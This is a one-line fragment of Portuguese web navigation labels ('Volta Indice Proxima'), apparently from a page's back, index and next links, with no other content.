Volta  Indice  Proxima